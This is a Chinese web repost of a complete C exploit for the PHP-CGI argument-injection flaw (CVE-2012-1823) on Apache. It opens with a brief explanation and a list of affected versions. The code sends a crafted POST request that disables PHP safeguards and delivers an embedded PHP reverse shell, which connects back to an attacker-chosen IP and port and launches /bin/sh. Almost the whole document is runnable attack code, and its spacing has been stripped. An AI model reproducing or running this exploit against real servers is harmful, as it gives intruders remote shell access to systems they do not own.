php5系列的apache远程执行漏洞攻击脚本
php5.x系列/apache远程执行漏洞及攻击脚本以下为相关代码,请文明使用。。。
/*ApacheMagicabyKingcope*/ /*gccapache-magika.c-oapache-magika-lssl*/ /*ThisisacodeexecutionbuginthecombinationofApacheandPHP. OndebianandUbuntuthevulnerabilityispresentinthedefaultinstall ofthephp5-cgipackage.Whenthephp5-cgipackageisinstalledonDebianand Ubuntuorphp-cgiisinstalledmanuallythephp-cgibinaryisaccessibleunder /cgi-bin/php5and/cgi-bin/php.Thevulnerabilitymakesitpossibletoexecute thebinarybecausethisbinaryhasasecuritycheckenabledwheninstalledwith Apachehttpserverandthissecuritycheckiscircumventedbytheexploit. Whenaccessingthephp-cgibinarythesecuritycheckwillblocktherequestand willnotexecutethebinary. Inthesourcecodefilesapi/cgi/cgi_main.cofPHPwecanseethatthesecurity checkisdonewhenthephp.iniconfigurationsettingcgi.force_redirectisset andthephp.iniconfigurationsettingcgi.redirect_status_envissettono. ThismakesitpossibletoexecutethebinarybypassingtheSecuritycheckby settingthesetwophp.inisettings. PriortothiscodefortheSecuritycheckgetoptiscalledanditispossible tosetcgi.force_redirecttozeroandcgi.redirect_status_envtozerousingthe -dswitch.Ifbothvaluesaresettozeroandtherequestissenttotheserver php-cgigetsfullyexecutedandwecanusethepayloadinthePOSTdatafield toexecutearbitraryphpandthereforewecanexecuteprogramsonthesystem. apache-magika.cisanexploitthatdoesexactlythepriordescribed.Itdoes supportSSL. /*Affectedandtestedversions PHP5.3.10 PHP5.3.8-1 PHP5.3.6-13 PHP5.3.3 PHP5.2.17 PHP5.2.11 PHP5.2.6-3 PHP5.2.6+lenny16withSuhosin-Patch Affectedversions PHPpriorto5.3.12 PHPpriorto5.4.2 Unaffectedversions PHP4-getoptparserunexploitable PHP5.3.12andup PHP5.4.2andup UnaffectedversionsarepatchedbyCVE-2012-1823. */ /* . /'\rrqrk . //\\ . .x.//fco\\-|- '//cmtco\\zt //6meqrg.\\tq //_________\\' EJPGQO apache-magica.cbyKingcope */ #include<stdio.h> #include<stdlib.h> #include<unistd.h> #include<getopt.h> #include<sys/types.h> #include<stddef.h> #include<openssl/rand.h> #include<openssl/ssl.h> #include<openssl/err.h> #include<netdb.h> #include<sys/socket.h> #include<netinet/in.h> typedefstruct{ intsockfd; SSL*handle; SSL_CTX*ctx; }connection; voidusage(char*argv[]) { printf("usage:%s<--targettarget><--portport><--protocolhttp|https>"\ "<--reverse-ipip><--reverse-portport>[--force-interpreterinterpreter]\n", argv[0]); exit(1); } charpoststr[]="POST%s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F"\ "%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64"\ "+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73"\ "%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E"\ "%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63"\ "%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62"\ "%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74"\ "%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68"\ "%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F"\ "%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63"\ "%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73"\ "%%5F%%65%%6E%%76%%3D%%30+%%2D%%6EHTTP/1.1\r\n"\ "Host:%s\r\n"\ "User-Agent:Mozilla/5.0(iPad;CPUOS6_0likemacOSX)appleWebKit/536.26"\ "(KHTML,likeGecko)Version/6.0Mobile/10A5355dSafari/8536.25\r\n"\ "Content-Type:application/x-www-form-urlencoded\r\n"\ "Content-Length:%d\r\n"\ "Connection:close\r\n\r\n%s"; charphpstr[]="<?php\n"\ "set_time_limit(0);\n"\ "$ip='%s';\n"\ "$port=%d;\n"\ "$chunk_size=1400;\n"\ "$write_a=null;\n"\ "$error_a=null;\n"\ "$shell='unsetHISTFILE;unsetHISTSIZE;uname-a;w;id;/bin/sh-i';\n"\ "$daemon=0;\n"\ "$debug=0;\n"\ "if(function_exists('pcntl_fork')){\n"\ " $pid=pcntl_fork(); \n"\ " if($pid==-1){\n"\ " printit(\"ERROR:Can'tfork\");\n"\ " exit(1);\n"\ " }\n"\ " if($pid){\n"\ " exit(0);\n"\ " }\n"\ " if(posix_setsid()==-1){\n"\ " printit(\"Error:Can'tsetsid()\");\n"\ " exit(1);\n"\ " }\n"\ " $daemon=1;\n"\ "}else{\n"\ " printit(\"WARNING:Failedtodaemonise.\");\n"\ "}\n"\ "chdir(\"/\");\n"\ "umask(0);\n"\ "$sock=fsockopen($ip,$port,$errno,$errstr,30);\n"\ "if(!$sock){\n"\ " printit(\"$errstr($errno)\");\n"\ " exit(1);\n"\ "}\n"\ "$descriptorspec=array(\n"\ " 0=>array(\"pipe\",\"r\"),\n"\ " 1=>array(\"pipe\",\"w\"),\n"\ " 2=>array(\"pipe\",\"w\")\n"\ ");\n"\ "$process=proc_open($shell,$descriptorspec,$pipes);\n"\ "if(!is_resource($process)){\n"\ " printit(\"ERROR:Can'tspawnshell\");\n"\ " exit(1);\n"\ "}\n"\ "stream_set_blocking($pipes[0],0);\n"\ "stream_set_blocking($pipes[1],0);\n"\ "stream_set_blocking($pipes[2],0);\n"\ "stream_set_blocking($sock,0);\n"\ "while(1){\n"\ " if(feof($sock)){\n"\ " printit(\"ERROR:Shellconnectionterminated\");\n"\ " break;\n"\ " }\n"\ " if(feof($pipes[1])){\n"\ " printit(\"ERROR:Shellprocessterminated\");\n"\ " break;\n"\ " }\n"\ " $read_a=array($sock,$pipes[1],$pipes[2]);\n"\ " $num_changed_sockets=stream_select($read_a,$write_a,$error_a,null);\n"\ " if(in_array($sock,$read_a)){\n"\ " if($debug)printit(\"SOCKREAD\");\n"\ " $input=fread($sock,$chunk_size);\n"\ " if($debug)printit(\"SOCK:$input\");\n"\ " fwrite($pipes[0],$input);\n"\ " }\n"\ " if(in_array($pipes[1],$read_a)){\n"\ " if($debug)printit(\"STDOUTREAD\");\n"\ " $input=fread($pipes[1],$chunk_size);\n"\ " if($debug)printit(\"STDOUT:$input\");\n"\ " fwrite($sock,$input);\n"\ " }\n"\ " if(in_array($pipes[2],$read_a)){\n"\ " if($debug)printit(\"STDERRREAD\");\n"\ " $input=fread($pipes[2],$chunk_size);\n"\ " if($debug)printit(\"STDERR:$input\");\n"\ " fwrite($sock,$input);\n"\ " }\n"\ "}\n"\ "\n"\ "fclose($sock);\n"\ "fclose($pipes[0]);\n"\ "fclose($pipes[1]);\n"\ "fclose($pipes[2]);\n"\ "proc_close($process);\n"\ "functionprintit($string){\n"\ " if(!$daemon){\n"\ " print\"$string\n\";\n"\ " }\n"\ "}\n"\ "exit(1);\n"\ "?>"; structsockaddr_in*gethostbyname_(char*hostname,unsignedshortport) { structhostent*he; structsockaddr_inserver,*servercopy; if((he=gethostbyname(hostname))==NULL){ printf("Hostnamecannotberesolved\n"); exit(255); } servercopy=malloc(sizeof(structsockaddr_in)); if(!servercopy){ printf("mallocerror(1)\n"); exit(255); } memset(&server,'\0',sizeof(structsockaddr_in)); memcpy(&server.sin_addr,he->h_addr_list[0], he->h_length); server.sin_family=AF_INET; server.sin_port=htons(port); memcpy(servercopy,&server,sizeof(structsockaddr_in)); returnservercopy; } char*sslread(connection*c) { char*rc=NULL; intreceived,count=0,count2=0; charch; for(;;) { if(!rc) rc=calloc(1024,sizeof(char)+1); else if(count2%1024==0){ rc=realloc(rc,(count2+1)*1024*sizeof(char)+1); } received=SSL_read(c->handle,&ch,1); if(received==1){ rc[count++]=ch; count2++; if(count2>1024*5) break; } else break; } returnrc; } char*read_(intsockfd) { char*rc=NULL; intreceived,count=0,count2=0; charch; for(;;) { if(!rc) rc=calloc(1024,sizeof(char)+1); else if(count2%1024==0){ rc=realloc(rc,(count2+1)*1024*sizeof(char)+1); } received=read(sockfd,&ch,1); if(received==1){ rc[count++]=ch; count2++; if(count2>1024*5) break; } else break; } returnrc; } voidmain(intargc,char*argv[]) { char*target,*protocol,*targetip,*writestr,*tmpstr,*readbuf=NULL, *interpreter,*reverseip,*reverseportstr,*forceinterpreter=NULL; charhttpsflag=0; unsignedshortport=0,reverseport=0; structsockaddr_in*server; intsockfd; unsignedintwritesize,tmpsize; unsignedinti; connection*sslconnection; printf("-==ApacheMagikabyKingcope==-\n"); for(;;) { intc; intoption_index=0; staticstructoptionlong_options[]={ {"target",required_argument,0,0}, {"port",required_argument,0,0}, {"protocol",required_argument,0,0}, {"reverse-ip",required_argument,0,0}, {"reverse-port",required_argument,0,0}, {"force-interpreter",required_argument,0,0}, {0,0,0,0} }; c=getopt_long(argc,argv,"",long_options,&option_index); if(c<0) break; switch(c){ case0: switch(option_index){ case0: if(optarg){ target=calloc(strlen(optarg)+1,sizeof(char)); if(!target){ printf("callocerror(2)\n"); exit(255); } memcpy(target,optarg,strlen(optarg)+1); } break; case1: if(optarg) port=atoi(optarg); break; case2: protocol=calloc(strlen(optarg)+1,sizeof(char)); if(!protocol){ printf("callocerror(3)\n"); exit(255); } memcpy(protocol,optarg,strlen(optarg)+1); if(!strcmp(protocol,"https")) httpsflag=1; break; case3: reverseip=calloc(strlen(optarg)+1,sizeof(char)); if(!reverseip){ printf("callocerror(4)\n"); exit(255); } memcpy(reverseip,optarg,strlen(optarg)+1); break; case4: reverseport=atoi(optarg); reverseportstr=calloc(strlen(optarg)+1,sizeof(char)); if(!reverseportstr){ printf("callocerror(5)\n"); exit(255); } memcpy(reverseportstr,optarg,strlen(optarg)+1); break; case5: forceinterpreter=calloc(strlen(optarg)+1,sizeof(char)); if(!forceinterpreter){ printf("callocerror(6)\n"); exit(255); } memcpy(forceinterpreter,optarg,strlen(optarg)+1); break; default: usage(argv); } break; default: usage(argv); } } if((optind<argc)||!target||!protocol||!port|| !reverseip||!reverseport){ usage(argv); } server=gethostbyname_(target,port); if(!server){ printf("Errorwhileresolvinghostname.(7)\n"); exit(255); } char*interpreters[5]; intninterpreters=5; interpreters[0]=strdup("/cgi-bin/php"); interpreters[1]=strdup("/cgi-bin/php5"); interpreters[2]=strdup("/cgi-bin/php-cgi"); interpreters[3]=strdup("/cgi-bin/php.cgi"); interpreters[4]=strdup("/cgi-bin/php4"); for(i=0;i<ninterpreters;i++){ interpreter=interpreters[i]; if(forceinterpreter){ interpreter=strdup(forceinterpreter); } if(forceinterpreter&&i) break; printf("%s\n",interpreter); sockfd=socket(AF_INET,SOCK_STREAM,0); if(sockfd<1){ printf("socketerror(8)\n"); exit(255); } if(connect(sockfd,(void*)server,sizeof(structsockaddr_in))<0){ printf("connecterror(9)\n"); exit(255); } if(httpsflag){ sslconnection=(connection*)malloc(sizeof(connection)); if(!sslconnection){ printf("mallocerror(10)\n"); exit(255); } sslconnection->handle=NULL; sslconnection->ctx=NULL; SSL_library_init(); sslconnection->ctx=SSL_CTX_new(SSLv23_client_method()); if(!sslconnection->ctx){ printf("SSL_CTX_newerror(11)\n"); exit(255); } sslconnection->handle=SSL_new(sslconnection->ctx); if(!sslconnection->handle){ printf("SSL_newerror(12)\n"); exit(255); } if(!SSL_set_fd(sslconnection->handle,sockfd)){ printf("SSL_set_fderror(13)\n"); exit(255); } if(SSL_connect(sslconnection->handle)!=1){ printf("SSL_connecterror(14)\n"); exit(255); } } tmpsize=strlen(phpstr)+strlen(reverseip)+strlen(reverseportstr)+64; tmpstr=(char*)calloc(tmpsize,sizeof(char)); snprintf(tmpstr,tmpsize,phpstr,reverseip,reverseport); writesize=strlen(target)+strlen(interpreter)+ strlen(poststr)+strlen(tmpstr)+64; writestr=(char*)calloc(writesize,sizeof(char)); snprintf(writestr,writesize,poststr,interpreter, target,strlen(tmpstr),tmpstr); if(!httpsflag){ write(sockfd,writestr,strlen(writestr)); readbuf=read_(sockfd); }else{ SSL_write(sslconnection->handle,writestr,strlen(writestr)); readbuf=sslread(sslconnection); } if(readbuf){ printf("***SERVERRESPONSE***\n\n%s\n\n",readbuf); }else{ printf("readerror(15)\n"); exit(255); } } exit(1); }